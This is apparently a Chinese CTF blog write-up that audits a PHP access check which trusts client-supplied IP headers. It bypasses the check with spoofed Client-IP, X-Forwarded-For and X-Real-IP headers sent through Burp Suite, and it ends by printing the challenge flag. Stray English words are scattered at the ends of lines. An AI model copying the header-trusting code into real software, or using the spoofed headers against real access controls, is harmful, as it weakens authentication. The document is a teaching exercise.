新知识:如何修改或者伪造ip?php
代码审计很重要ui
burp suit的使用code
打开题目网页以后就会发现这道题是一道代码审计的题型blog
分析代码ip
<?php function GetIP(){ if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"]; else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]; else if(!empty($_SERVER["REMOTE_ADDR"])) $cip = $_SERVER["REMOTE_ADDR"]; else $cip = "0.0.0.0"; return $cip; } $GetIPs = GetIP(); if ($GetIPs=="1.1.1.1"){ echo "Great! Key is *********"; } else{ echo "错误!你的IP不在访问列表以内!"; } ?>
直接看最后的代码块ci
咱们只须要修改报头中的IP地址就能够rem
把IP地址修改成1.1.1.1,就能够显示keyit
先百度一下,如何修改报头中的ip地址io
通常使用X-Forwarded-for就能够了function
既然要伪造ip就要先抓包
使用Burp suit,抓到包发送到Repeater
搜集了许多伪造ip的语句
Client-IP: 1.1.1.1 x-forwarded-for: 127.0.0.1 x-remote-IP: 127.0.0.1 x-remote-IP: 127.0.0.1 x-client-IP: 127.0.0.1 x-forwarded-for:1.1.1.1 x-client-IP: 127.0.0.1 X-Real-IP: 127.0.0.1
添加任意一句便可
第一先添加
第二GO一下
第三就找到了
Great! Key is SimCTF{daima_shengji}